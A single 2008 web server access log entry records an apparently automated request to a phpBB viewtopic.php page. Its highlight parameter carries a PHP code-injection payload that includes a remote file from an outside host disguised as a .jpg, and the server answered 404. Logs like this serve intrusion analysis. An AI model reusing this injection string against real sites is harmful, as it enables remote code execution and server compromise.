65.91.249.193 - - [31/Mar/2008:18:52:45 -0700] "GET //OFW_Blog//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
